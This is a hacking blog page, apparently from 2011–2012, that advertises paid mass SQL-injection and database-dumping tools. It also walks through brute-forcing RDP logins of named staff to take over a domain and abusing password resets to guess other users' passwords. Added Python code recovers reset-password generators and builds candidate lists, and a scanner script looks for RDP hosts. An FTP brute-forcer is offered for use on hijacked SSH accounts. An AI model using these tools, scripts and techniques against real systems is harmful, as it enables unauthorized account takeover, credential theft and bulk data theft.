Showing posts with label BruteForce. Show all posts
Oct 2, 2012

SQLi Dumper v.5.0

SQLi Dumper - Advanced SQL Injection / Scanner Tool

Designed to find and exploit web security vulnerabilities
in bulk, automatically. It is robust, works in background
threads and is very fast.
Uses an advanced search engine backed by seven
different online search services
(Google, Yandex, Bing, Yahoo, Sapo, Altavista and Terravista).


SQLi Dumper Features:
 -Supports multiple online search engines (to find targets);
 -Automated exploiting and analyzing from a URL list;
 -Automated search for data in a bulk URL list;
 -Automated analyzer for injection points using
URL, POST, Cookies, UserLogin or UserPassword;
 -Dumper supports dumping data with multi-threading
(databases/tables/columns/fetching data);
 -Exploiter supports up to 100 threads;
 -Analyzer and Dumper support up to 50 threads;
 -Advanced WAF bypass methods;
 -Advanced custom query box;
 -Dumper can dump large amounts of data, with fine
control of the delay between requests (multi-threading);
 -Easy switching from vulnerability to vulnerability;
 -Supports proxy lists;
 -GeoIP database;
 -Internal database;
 -Trash System;
 -Admin login finder;
 -Hash online cracker;
 -Reverse IP;
 -Standalone .exe (no install).
SQL Injection Methods supported:
- MySQL
 - Union (Integer / String)
 - Error (Integer / String)
 ** Error Methods:
  - Double Query
  - XPATH - ExtractValue
  - XPATH - UpdateXML
 - Brute Forcing
 - Blind
 - Load File
 - Load File Scanner
 ** Illegal Mix Of Collations:
  - UnHex(Hex())
  - Binary()
  - Cast As Char
  - Compress(Uncompress())
  - Convert Using utf8
  - Convert Using latin1
  - Aes_decrypt(aes_encrypt())
- MS SQL
 - Union (Integer / String)
 - Error (Integer / String)
 ** Illegal Mix Of Collations:
  - SQL_Latin1;
  - Cast As Char.
- Oracle
 - Union (Integer / String)
 - Error (Integer / String)
 ** Error Methods:
  - GET_HOST_ADDRESS
  - DRITHSX.SN
  - GETMAPPINGXPATH.
 ** Illegal Mix Of Collations:
  - Cast As Char.
 ** Supports TOP N Types:
  - ROWNUM
  - RANK()
  - DENSE_RANK()

** Analyzer also detects:
 - MS Access
 - PostgreSQL
 - Sybase
 
 
** To use this tool you should know a little
 about SQL injection.

Demo Version Limitations:

 - Max. URL per search 500
 - Get links by ReverseIP DISABLED
 - Max. Trash 5000 URLs
 - SQL Injection Obfuscate - Bypass Functions and
Keywords Filtering DISABLED
 - Exploiter max. threads 20
 - Analyzer max. threads 3
 - Running multiple instances DISABLED
 - Running multiple mini dump instances DISABLED
 - Dumping rows with multi-threading DISABLED
 - Network Credential DISABLED
 - Injection methods for POST, Cookies, etc. DISABLED
 - Proxy DISABLED
 - ReverseIP DISABLED
 - Load_File() scanner DISABLED

 ** Download: http://www.mediafire.com/?vfb8fps2beppsib
 ** Dependencies: Microsoft .NET Framework 4.x
  http://www.microsoft.com/en-us/download/details.aspx?id=17851
 
Price and Payment Method:
 - Binary (EXE): 150 USD / 115€ Euro
 - Source Code (VB.NET 2010): 2.000 USD / 1.550€ Euro
 ** Liberty Reserve

Contacts:

 - mysqlidumper [at] gmail [dot] com (email)
 - c4rl0s@jabber.org (IM Chat)

More Screen Shots:

http://imageshack.us/a/img40/9792/54476110.png
http://imageshack.us/a/img26/7343/43570486.png
http://imageshack.us/a/img833/1754/29794037.png
http://imageshack.us/a/img838/5985/62974282.png
http://imageshack.us/a/img405/2636/41411581.png
http://imageshack.us/a/img253/7108/87770469.png
http://imageshack.us/a/img845/5708/27459044.png
http://imageshack.us/a/img253/4696/23767618.png
http://imageshack.us/a/img338/4593/86695223.png
http://imageshack.us/a/img689/1859/84670334.png
http://imageshack.us/a/img692/4218/79948522v.png
http://imageshack.us/a/img571/690/48570647.png
http://imageshack.us/a/img27/8163/19180735.png
http://imageshack.us/a/img823/6977/14995786.png
http://imageshack.us/a/img443/4640/60463828.png
http://imageshack.us/a/img841/9392/43723692.png
http://imageshack.us/a/img20/8374/86406807.png
http://imageshack.us/a/img221/7549/38372480.png
http://imageshack.us/a/img16/1558/76135157.png
http://imageshack.us/a/img411/1913/97064053.png
http://imageshack.us/a/img208/1747/83970473.png
http://imageshack.us/a/img840/6143/78458462.png
http://imageshack.us/a/img268/5611/96006062.png
http://imageshack.us/a/img253/3442/47787419.png
http://imageshack.us/a/img849/4741/14173095.png
http://imageshack.us/a/img191/1821/61869828.png  
Aug 13, 2012

MySQLi Dumper | SQLi Injection Tool

MySQLi Dumper is an advanced automated SQL injection tool dedicated to SQL injection attacks on MySQL and MS SQL.
It is designed to find and exploit web security vulnerabilities in bulk, automatically.
It is robust, works in background threads and is very fast.

What sets MySQLi Dumper apart from similar tools:
  1. -Supports multiple online search engines (to find targets);
  2. -Automated exploiting and analyzing from a URL list, with a high success rate;
  3. -Automated search for column names from a URL list (searches for column names 'where like %value%', useful to find e.g. mails);
  4. -Dumper supports dumping data with multi-threading (databases/tables/columns/fetching data);
  5. -Dumper can dump large data sets, with fine control of the delay per request (multi-threading);
  6. -Easy switching from vulnerability to vulnerability;
  7. -You can see everything that is loaded by HTTP request (HTTP debugger)
Some features:
  1. -Online multi. search engine;
  2. -Supports MySQL Union, MySQL Error, MS SQL Union, MS SQL Error, Integer/String;
  3. -Automated exploiting;
  4. -Automated analyzing;
  5. -Trash system (you never exploit the same URL twice);
  6. -Database to collect all vulnerabilities (with an option to search for data in mass);
  7. -Customized exploiter and analyzer;
  8. -GeoIP database;
  9. -Small browser you can use for Union counting, viewing source code and HTTP headers;
  10. -Back-end database fingerprint, retrieve DBMS users and password hashes, dump tables and columns, fetch data from the database, run custom SQL statements, save/load sessions to an XML file;
  11. -Brute forcing for MySQL <= 4.x (those versions have no information_schema to read table and column names from);
  12. -File dumper for MySQL;
  13. -File dumper scanner for MySQL;
  14. -Blind dumper for MySQL;
  15. -WAF bypass method;
  16. -Supports a single proxy or proxy lists (random/in order).
  17. -Online hash cracking;
  18. -Admin login finder;
  19. -Multi-threading;
  20. -User friendly GUI;
Screen Shots

To use this tool you should know a little about SQL injection.
Price 60€ / 74 USD full version.
Full source code 1000€ / 1227 USD
Accepted payments
- libertyreserve.com
- moneybookers.com (trusted users)
- paypal.com (maybe..)
Dependencies: .NET Framework v.4
Demo version available (older version only)!
Download: http://www.mediafire.com/?wberio939vwh1ez
Demo Limitations
Max. URL per search 500
Get links by ReverseIP DISABLED
Max. Trash 5000 URLs
SQL Injection Obfuscate - Bypass Functions and Keywords Filtering DISABLED
Exploiter max. threads 20
Analyzer max. threads 3
Network credential DISABLED
Proxy DISABLED
ReverseIP DISABLED
The blind dumper is disabled in the DEMO EDITION; you can check Version() only, as a demo :)
Load_File() scanner DISABLED
If you bought v. 4.x,
email me for a free update!
Contact: mysqlidumper [ at ] gmail [ dot ] com
Apr 20, 2012

Abusing Password Resets

This post focuses on analyzing entropy and in-line password resets, two major problems with forgot/reset-password functionality. To do this we have to automate both requesting a forgotten password hundreds of times and parsing through all of the e-mails we receive. Thanks to the recently added macro support in Burp (thanks PortSwigger), less effort is required on our part when an application employs anti-automation features to prevent such attempts.

For those not familiar with Burp Suite's macro support, let's walk through it.

So here is a picture of the email reset we've been sent:
Initiating a password reset is a sequence of four request/response pairs. This sequence is saved in our proxy history. We navigate to Options > Sessions > Macros > New and highlight the four messages saved in the proxy history to create and configure the new macro.

Take a look at the screenshot below:
Now we need to configure each individual request/response to extract the data we want. We have to grab a JSESSIONID and a Struts token. Let's highlight the first request/response and configure it.
Example of configuring one of the items
You'll notice that for the first request I've chosen not to use cookies from the cookie jar. This is because I want to start the sequence clean, without a cookie.


Notice that struts.token.name and struts.token are dynamic and change on every request, so we derive them from the response. The rest are preset values like email and birthdate (no, not my real birthdate). One important thing to notice is that I've unchecked URL encode for the email portion. It is already URL encoded, so there is no need; otherwise it will cause problems.



Name the Macro 

Next, add the macro to a session handling rule: again Options > Sessions > Session Handling > New, then highlight the macro you'd like to use.






Next, you'll need to add the pages to scope:




Now send the original first request (I do this from the proxy history in Burp) over to Intruder, select null payloads and set the count to a number large enough to collect a big sample of passwords so we can review their entropy. Below, Intruder is configured to send the password reset sequence 800 times. The session rule runs the macro on each request, so you are essentially resetting the password 800 times.


Next we need to retrieve the emails from Gmail and review them for entropy. Here is a script I've written to retrieve emails from Gmail over POP3, parse out the password values and write them to a file called tokens.txt:



Lines 11-17:

Line 12: File we will place all of our emails in (make sure you create an inbox folder)
Line 13: Initialize Pop class
Line 14: Enable SSL
Line 15: Replace with your username and password
Line 16: Call the check_for_emails method with the pop obj

Lines 20-27:

Line 21-22: If there are no emails, print that fact to the screen
Line 24-25: We have emails, print that fact to the screen and call place_emails_into_file method with the pop object.

Lines 31-36:

Line 31: Iterate through the pop array
Line 32: Open the file (line 12)
Line 33: Write the messages to the file
Line 36: Call the create_file_with_tokens method


Lines 40-53:

Line 41: Create a new_file object which is a file called tokens.txt
Line 42: Create a read_file object which reads the inbox/emails.txt file from Line 12
Line 43: Begin reading each line from the read_file
Lines 44-46: If the line matches "password: somepassword", write it to the file.
Line 53: Kick the whole thing off

Review the tokens.txt file

We can see that the new passwords sent aren't very random. We could load them into Burp Sequencer, but there really isn't any point when it is this easy. It is obvious that the developer has two separate arrays of words and another array of numbers. They pick "randomly" from those piles and concatenate the values. Here is the actual line of code I wrote to do this, and yes, this is a real-life example I've come across:




Factors that could slow us down:

1) If we can't enumerate e-mail addresses somehow. An example of enumeration would be typing in a username/e-mail address and having the site tell you it doesn't exist. Now we know who DOES exist on the system.

2) This particular site requires a birthdate along with the email address. This is difficult but not impossible. If we know the e-mail address exists, it is a matter of guessing the birthdate (automate it with Intruder).

3) After we've reset other users' passwords, we need to guess the password (made MUCH easier by reviewing the entropy). If an account lockout policy is enforced (after a small number of incorrect password submissions), the account may be locked out, leaving us without access. That is no fun.

Even if the reset or forgotten-password function doesn't send us a clear-text password, it may send us a reset link. It is just as important to review the randomness of that link.

Here is an example of loading the tokens file in sequencer:


Summary:

We've bypassed the Struts token and the multi-step password reset flow, which might have been intended to slow us down. We've collected all of our emails and parsed them for passwords/tokens/links. We've reviewed the entropy manually (in this case), but we can also do this with Sequencer. Now we have a way to guess passwords more efficiently, which in combination with other flaws leaves us only a short step from compromising accounts.
All credit for this post goes to carnal0wnage
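The parsing and entropy review the post walks through, as an added worked example in Python. This is not the post's retrieval script (which pulled the messages from Gmail); it works on a saved mailbox dump, and everything in it is this example's own: the e-mail bodies are constructed, the regex and the word-split heuristic are assumptions, and the heuristic only recovers the structure when the generator really does concatenate picks from fixed word and number lists, which is what the post observed.

```python
import math
import re
from collections import Counter

# Constructed sample mailbox dump (made-up values, not data from the post).
# It stands in for the inbox/emails.txt file the retrieval script writes.
SAMPLE_EMAILS = """\
From: noreply@example.test
Subject: Your password has been reset
Your new password: blueriver42

From: noreply@example.test
Subject: Your password has been reset
Your new password: redstone17

From: noreply@example.test
Subject: Your password has been reset
Your new password: bluestone42

From: noreply@example.test
Subject: Your password has been reset
Your new password: greenriver17

From: noreply@example.test
Subject: Your password has been reset
Your new password: redriver42

From: noreply@example.test
Subject: Your password has been reset
Your new password: blueriver17
"""

PASSWORD_RE = re.compile(r"password:\s*(\S+)", re.IGNORECASE)


def extract_passwords(mail_text):
    """Pull every value following 'password:' out of a saved mailbox dump."""
    return PASSWORD_RE.findall(mail_text)


def split_alpha_digits(token):
    """Separate 'blueriver42' into ('blueriver', '42'); None if it does not fit."""
    m = re.fullmatch(r"([A-Za-z]+)(\d+)", token)
    return (m.group(1).lower(), m.group(2)) if m else None


def infer_word_split(alpha, others):
    """Guess where two concatenated dictionary words meet (heuristic).

    The split point chosen is the one whose prefix and suffix are re-used
    most often by the other samples: picks from two fixed word lists share
    prefixes and suffixes, random strings do not.
    """
    if len(alpha) < 2:
        return alpha, ""
    best_pos, best_score = 1, -1
    for pos in range(1, len(alpha)):
        head, tail = alpha[:pos], alpha[pos:]
        score = sum(o != alpha and o.startswith(head) for o in others) \
            + sum(o != alpha and o.endswith(tail) for o in others)
        if score > best_score:
            best_pos, best_score = pos, score
    return alpha[:best_pos], alpha[best_pos:]


def analyze(passwords):
    """Recover the generator's word/number lists and size the real keyspace."""
    parts = [p for p in map(split_alpha_digits, passwords) if p]
    if not parts:
        raise ValueError("no passwords of the expected word+word+number shape")
    alphas = [a for a, _ in parts]
    firsts, seconds, numbers = Counter(), Counter(), Counter()
    for alpha, digits in parts:
        head, tail = infer_word_split(alpha, alphas)
        firsts[head] += 1
        seconds[tail] += 1
        numbers[digits] += 1
    keyspace = len(firsts) * len(seconds) * len(numbers)
    # What a reviewer would assume from length alone: [a-z0-9] per position.
    avg_len = sum(len(p) for p in passwords) / len(passwords)
    return {
        "first_words": sorted(firsts),
        "second_words": sorted(seconds),
        "numbers": sorted(numbers),
        "keyspace": keyspace,
        "effective_bits": math.log2(keyspace),
        "naive_bits": round(avg_len * math.log2(36), 1),
    }


def candidate_passwords(report):
    """Every password the recovered generator can produce (an Intruder payload list)."""
    return [f"{a}{b}{n}"
            for a in report["first_words"]
            for b in report["second_words"]
            for n in report["numbers"]]


if __name__ == "__main__":
    found = extract_passwords(SAMPLE_EMAILS)
    rep = analyze(found)
    print(f"{len(found)} passwords seen, {rep['keyspace']} possible values "
          f"({rep['effective_bits']:.1f} bits vs {rep['naive_bits']} naive)")
    print("\n".join(candidate_passwords(rep)))
```

The recovered lists are a lower bound: a word the generator can emit but that never showed up in the sample is missed, which is why the post collects hundreds of resets rather than a handful before drawing conclusions.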

Apr 13, 2012

rdpScan Network Checker

This is a simple script that leverages nmap to scan for RDP servers.

#!/bin/bash
#
# rdpScan - scan a network segment for RDP-Server
# author: silverstoneblue@gmx.net
# requires:  fgrep awk nmap
# note: the SYN scan (-sS) needs raw sockets, so run as root (sudo).

scriptname="rdpScan"
version="1.0"
rdpips="/tmp/tmprdp.$$"

declare -i rdpfound=0

# Abort if a required tool is not in PATH.
function is_installed {
  if ! command -v "$1" > /dev/null 2>&1
  then
    printf "\nERROR: %s not installed.\n\n" "$1"
    exit 255
  fi
}

is_installed fgrep
is_installed awk
is_installed nmap

if [ $# -ne 1 ]; then
  printf "\n \n"
  printf "rdpScan - scan a network segment for RDP-Server \n\n"
  printf "version %s by silverstoneblue@gmx.net \n\n" "$version"
  printf "Usage: %s {target network}\n\n" "$scriptname"
  printf "target network:\n"
  printf "  can pass hostnames, IP's, networks, etc.\n"
  printf "  server.company.com, company.com/24, 192.168.0.1/16, 10.0.0-255.1-254\n"
  printf "example:\n"
  printf "  %s 80.187.0.0/24\n\n" "$scriptname"
  exit 255
fi

iprange=$1

printf "\nScanning for RDP-Server..."

# -Pn skips host discovery (older nmap spelled it -P0). Grepable output (-oG -)
# puts each host on one line: "Host: <ip> ()  Ports: 3389/open/tcp//<service>///".
# Match on port and state, not on the service name: old nmap labels 3389
# "ms-term-serv", current releases "ms-wbt-server", and a fixed string with the
# old label silently matches nothing on a newer nmap.
nmap -n -Pn -sS -p 3389 -oG - "$iprange" | fgrep '3389/open/tcp' | awk '{print $2}' > "$rdpips"

printf "\n\n"

exec 3< "$rdpips"

echo "*****************"
echo "RDP IP Address"
echo "*****************"

while read -r rdpip <&3 ; do
  rdpfound+=1
  printf "%-15s\n" "$rdpip"
done

exec 3<&-

if [ $rdpfound -eq 0 ] ; then
  printf "No RDP-Server found on network target %s. \n\n" "$iprange"
  rm -f "$rdpips"
  exit 255
fi

printf "\n%d RDP-Server found on network target %s.\n" $rdpfound "$iprange"
printf "Now try ur luck ;)\n"
printf "have fun ;) \n"
rm -f "$rdpips"
exit 0

Download
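The fgrep in the script keys on the service label nmap prints for 3389, which changed from ms-term-serv to ms-wbt-server in later releases, so the original pattern finds nothing on a current nmap. As an added example (not part of the original script), here is a small Python parser for nmap's grepable (-oG) format that selects on port and state instead and also copes with closed and filtered results and with multi-port lines. The scan text below is constructed to mimic -oG output, not taken from a real scan, and the function names are this example's own:

```python
import ipaddress
import re

# Constructed sample of `nmap -n -Pn -sS -p 3389 -oG -` output (made up, not a
# real scan). Both service labels nmap has used for 3389 appear on purpose.
SAMPLE_GREPABLE = """\
# Nmap 7.93 scan initiated Mon Jan  1 00:00:00 2024 as: nmap -n -Pn -sS -p 3389 -oG - 10.0.0.0/29
Host: 10.0.0.1 ()\tStatus: Up
Host: 10.0.0.1 ()\tPorts: 3389/open/tcp//ms-wbt-server///\tIgnored State: closed (0)
Host: 10.0.0.2 ()\tStatus: Up
Host: 10.0.0.2 ()\tPorts: 3389/closed/tcp//ms-wbt-server///
Host: 10.0.0.3 ()\tStatus: Up
Host: 10.0.0.3 ()\tPorts: 3389/open/tcp//ms-term-serv///
Host: 10.0.0.4 ()\tStatus: Up
Host: 10.0.0.4 ()\tPorts: 3389/filtered/tcp//ms-wbt-server///
Host: 10.0.0.5 ()\tStatus: Up
Host: 10.0.0.5 ()\tPorts: 22/open/tcp//ssh///, 3389/open/tcp//ms-wbt-server///
# Nmap done at Mon Jan  1 00:00:05 2024 -- 8 IP addresses (5 hosts up) scanned in 5.00 seconds
"""

# "Host: <ip> (<hostname>)" followed by tab-separated fields.
HOST_RE = re.compile(r"^Host:\s+(\S+)\s+\(([^)]*)\)\t(.*)$")


def parse_grepable(text):
    """Map each IP to {(port, proto): (state, service)} from -oG output.

    Fields after the host are tab separated ("Status: Up", "Ports: ...",
    "Ignored State: ..."); each port entry is port/state/proto/owner/service/...
    """
    hosts = {}
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue                      # comment lines and anything else
        ip, fields = m.group(1), m.group(3)
        entry = hosts.setdefault(ip, {})
        for field in fields.split("\t"):
            key, _, value = field.partition(": ")
            if key != "Ports":
                continue
            for spec in value.split(", "):
                port, state, proto, _owner, service = spec.split("/")[:5]
                entry[(int(port), proto)] = (state, service)
    return hosts


def hosts_with_open_port(hosts, port, proto="tcp"):
    """IPs where the given port is reported open, in address order."""
    return sorted(
        (ip for ip, ports in hosts.items()
         if ports.get((port, proto), ("", ""))[0] == "open"),
        key=ipaddress.ip_address,
    )


if __name__ == "__main__":
    for ip in hosts_with_open_port(parse_grepable(SAMPLE_GREPABLE), 3389):
        print(f"{ip:<15}")
```

Feed it the output of the same nmap command the script runs (`nmap -n -Pn -sS -p 3389 -oG - <target>`) on stdin or from a file; the filtered host is reported separately in the parsed dictionary, which the original pipeline threw away along with everything else that was not an exact string match.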
Dec 20, 2011

RDP Scanning & Cracking



DISCLAIMER
All information provided is for educational purposes only. It is not an endorsement to undertake hacking activity in any form (unless such activity is authorized). The tools and techniques demonstrated may be damaging if used inappropriately. All characters and data in this post are fictitious.

The Remote Desktop Protocol is often underestimated as a possible way to break into a system during a penetration test. Other services, such as SSH and VNC, are more likely to be targeted with a remote brute-force password guessing attack. For example, let's suppose that we are in the middle of a penetration test at the "MEGACORP" offices and have already tried all the available remote attacks with no luck. We also tried ARP poisoning on the LAN hoping to capture usernames and passwords, without success. From a previous nmap scan log we found a few Windows machines with the RDP port open and decided to investigate this possibility further. First of all we need some valid usernames, so that we only have to guess passwords rather than both. We found the names of the IT staff on various social networking websites. These are the key IT staff:
jessie tagle
julio feagins
hugh duchene
darmella martis
lakisha mcquain
ted restrepo
kelly missildine
It didn't take long to create probable usernames following the common convention of first initial plus surname:
jtagle
jfeagins
hduchene
dmartis
lmcquain
trestrepo
kmissildine
Software required:
Linux machine, preferably Ubuntu.
nmap and a terminal server client, plus the build dependencies for Ncrack: sudo apt-get install tsclient nmap build-essential checkinstall libssl-dev libssh-dev
About Ncrack
Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords. Security professionals also rely on Ncrack when auditing their clients. Ncrack's features include a very flexible interface granting the user full control of network operations, allowing for very sophisticated brute-forcing attacks, timing templates for ease of use, runtime interaction similar to Nmap's and many more. Protocols supported include RDP, SSH, HTTP(S), SMB, POP3(S), VNC, FTP and telnet. http://nmap.org/ncrack/
Installation
wget http://nmap.org/ncrack/dist/ncrack-0.4ALPHA.tar.gz
mkdir /usr/local/share/ncrack
tar -xzf ncrack-0.4ALPHA.tar.gz
cd ncrack-0.4ALPHA
./configure
make
checkinstall
dpkg -i ncrack_0.4ALPHA-1_i386.deb
Information gathering
Let's find out which hosts in the network are up and save them to a text list. The regular expression parses out only the IP addresses from the scan output.
Nmap ping scan (-sP; spelled -sn in current Nmap): go no further than determining whether a host is online
nmap  -sP 192.168.56.0/24 | grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' > 192.168.56.0.txt
Nmap fast scan with input from list of hosts/networks
nmap -F -iL 192.168.56.0.txt
Starting Nmap 5.21 ( http://nmap.org ) at 2011-04-10 13:15 CEST
 
Nmap scan report for 192.168.56.10
Host is up (0.0017s latency).
Not shown: 91 closed ports
PORT     STATE SERVICE
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
1028/tcp open  unknown
3389/tcp open  ms-term-serv
MAC Address: 08:00:27:09:F5:22 (Cadmus Computer Systems)
 
Nmap scan report for 192.168.56.101
Host is up (0.014s latency).
Not shown: 96 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-term-serv
MAC Address: 08:00:27:C1:5D:4E (Cadmus Computer Systems)
 
Nmap done: 55 IP addresses (55 hosts up) scanned in 98.41 seconds
From the log we can see two machines with the Microsoft Terminal Services port (3389) open. Looking more closely at the services available on 192.168.56.10 (Kerberos, LDAP, SMB), we can assume that this machine is the domain controller, and it's worth trying to pwn it.
At this point we need to create a file (my.usr) with the probable usernames gathered earlier.
vim my.usr
jtagle
jfeagins
hduchene
trestrepo
kmissildine
We also need a file (my.pwd) with passwords; you can look on the internet for common passwords and wordlists.
vim my.pwd
somepassword
passw0rd
blahblah
12345678
iloveyou
trustno1
At this point we run Ncrack against the 192.168.56.10 machine.
ncrack -vv  -U my.usr -P my.pwd 192.168.56.10:3389,CL=1
 
Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-10 17:24 CEST
 
Discovered credentials on rdp://192.168.56.10:3389 'hduchene' 'passw0rd'
rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon.
Discovered credentials on rdp://192.168.56.10:3389 'jfeagins' 'blahblah'
rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon.
Discovered credentials on rdp://192.168.56.10:3389 'jtagle' '12345678'
rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon.
Discovered credentials on rdp://192.168.56.10:3389 'kmissildine' 'iloveyou'
rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon.
Discovered credentials on rdp://192.168.56.10:3389 'trestrepo' 'trustno1'
 
 
Discovered credentials for rdp on 192.168.56.10 3389/tcp:
192.168.56.10 3389/tcp rdp: 'hduchene' 'passw0rd'
192.168.56.10 3389/tcp rdp: 'jfeagins' 'blahblah'
192.168.56.10 3389/tcp rdp: 'jtagle' '12345678'
192.168.56.10 3389/tcp rdp: 'kmissildine' 'iloveyou'
192.168.56.10 3389/tcp rdp: 'trestrepo' 'trustno1'
 
Ncrack done: 1 service scanned in 98.00 seconds.
Probes sent: 51 | timed-out: 0 | prematurely-closed: 0
 
Ncrack finished.
We can see from the Ncrack results that all the usernames we tried are valid, and we were also able to crack the logins since they used weak passwords. Four of the IT staff have some kind of restriction on this machine; the exception is hduchene, who might be the domain administrator. Let's find out.
Run the terminal server client from the Linux box:
tsclient 192.168.56.10, log in with Hugh Duchene's credentials 'hduchene' 'passw0rd' and BINGO !!!

At this point we control the entire MEGACORP domain, with unlimited access to all corporate resources tied to the domain. We can add users, escalate the privileges of existing users, browse protected network resources, install backdoors and rootkits, and much more.



Enjoy ,,
Sep 4, 2011

DFF Scanner

- find files and folders on a server
- customized search
- included in BackTrack 4

A web administrator's file / folder scanner

DFF Scanner
(download)

Webshag

Webshag is a multi-threaded, multi-platform web server audit tool. Written in Python, it gathers commonly useful functionality for web server auditing such as website crawling, URL scanning and file fuzzing.
Webshag can scan a web server over HTTP or HTTPS, through a proxy and using HTTP authentication (Basic and Digest). In addition, it offers IDS evasion functionality aimed at making correlation between requests harder (e.g. using a different random HTTP proxy server per request).

It also provides the capability to retrieve the list of domain names hosted on a target machine, and file fuzzing using dynamically generated filenames (in addition to common list-based fuzzing).

The Webshag URL scanner and file fuzzer aim to reduce the number of false positives and thus produce cleaner result sets. For this purpose, webshag implements a web page fingerprinting mechanism that is resistant to content changes. This fingerprint is then used in a false-positive removal algorithm specifically aimed at "soft 404" server responses.
Webshag provides a full-featured and intuitive graphical user interface as well as a text-based command line interface, and is available for Linux and Windows.

Requirements

To be fully functional, webshag requires the following elements:
  • Python 2.5/2.6 (NOT compatible with Python 3.0)
  • wxPython 2.8.9.0 or greater GUI toolkit
  • Nmap port scanner (for port scanning module only)
  • A valid Live Search AppID (for domain information module only)
Note: to use installer on Windows Vista, please refer to user manual.

Downloads

version 1.10
Linux (tarball) ws110.tar.gz
Windows (ZIP archive) ws110.zip
Windows (installer) ws110_win32installer.zip
User manual (EN) ws110_manual.pdf

Fireforce

Fireforce is a Firefox extension designed to perform brute-force attacks on GET and POST forms.
Fireforce can use dictionaries or generate passwords based on several character types.
Fireforce can be used on any platform running the Firefox web browser

Download Firefox Addon

Mini MySqlat0r

Mini MySqlat0r is a multi-platform application used to audit web sites in order to discover and exploit SQL injection vulnerabilities. It is written in Java and is used through a user-friendly GUI that contains three distinct modules.

The Crawler module lets the user view the web site structure and gather all tamperable parameters. These parameters are then sent to the Tester module, which tests each parameter for SQL injection vulnerabilities. Any that are found are then sent to the Exploiter module, which can exploit the injections to gather data from the database.

Mini MySqlat0r can be used on any platform running Java.

Download Tool

Download Manual
Aug 31, 2011

ev1lut10n local ftp bruter version 1.0

Hi there.. another quality tool by my friend ev1lut10n, for brute-forcing FTP logins via SSH servers. You can use any SSH account you get from your scanning to try to crack FTPs. The tool works on localhost.


Download : http://jayakonstruksi.com/backupintsec/ev1cpanel_finder.tgz

Suggested: run it on an SSH account that you have taken over

==========
ev1lut10n@ev1l:~$ wget jayakonstruksi.com/backupintsec/ev1cpanel_finder.tgz
--2011-08-31 16:55:31-- http://jayakonstruks.../e...finder.tgz
Resolving jayakonstruksi.com... 202.155.61.121
Connecting to jayakonstruksi.com|202.155.61.121|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2638 (2.6K) [application/x-tar]
Saving to: `ev1cpanel_finder.tgz'

100%[===================================================================================================================>] 2,638 --.-K/s in 0.01s

2011-08-31 16:55:31 (204 KB/s) - `ev1cpanel_finder.tgz' saved [2638/2638]

ev1lut10n@ev1l:~$ tar zxvf ev1cpanel_finder.tgz
ev1cpanel_finder/
ev1cpanel_finder/ftp_credentials.txt
ev1cpanel_finder/ev1cp.pl
ev1cpanel_finder/invalid_user_lists.txt
ev1cpanel_finder/password.txt
ev1lut10n@ev1l:~$ cd ev1cpanel_finder
ev1lut10n@ev1l:~/ev1cpanel_finder$ perl ev1cp.pl

============


then just wait for some hours ;-p


=========
ev1lut10n@ev1l:~/ev1cpanel_finder$ perl ev1cp.pl

_____
___ _ _< / /
/ -_) |/ / / /
__/|___/_/_/ uti0n Cpanel Finder


H3llc0me to ev1lut10n Cpanel Finder version 1.0


checking whether 21 is open or not at :
ev1lut10n@ev1l:~/ev1cpanel_finder$
Start ftp dict attack at 127.0.0.1 for username:bojing

Start ftp dict attack at 127.0.0.1 for username:ev1lut10n

testing bojing and bojing at 127.0.0.1

Start ftp dict attack at 127.0.0.1 for username:kacung

snippped-----------

_____
___ _ _< / /
/ -_) |/ / / /
__/|___/_/_/ uti0n Cpanel Finder


H3llc0me to ev1lut10n Cpanel Finder version 1.0


Finished ! please check ftp_credentials.txt, if null means fail epic !
ev1lut10n@ev1l:~/ev1cpanel_finder$ cat ftp_credentials.txt
null

[+] w00t kacung : 123 found !!!


[+] w00t bojing : 12345 found !!!

==========

On success you get some weak passwords on that box
 
FlashcRew Blog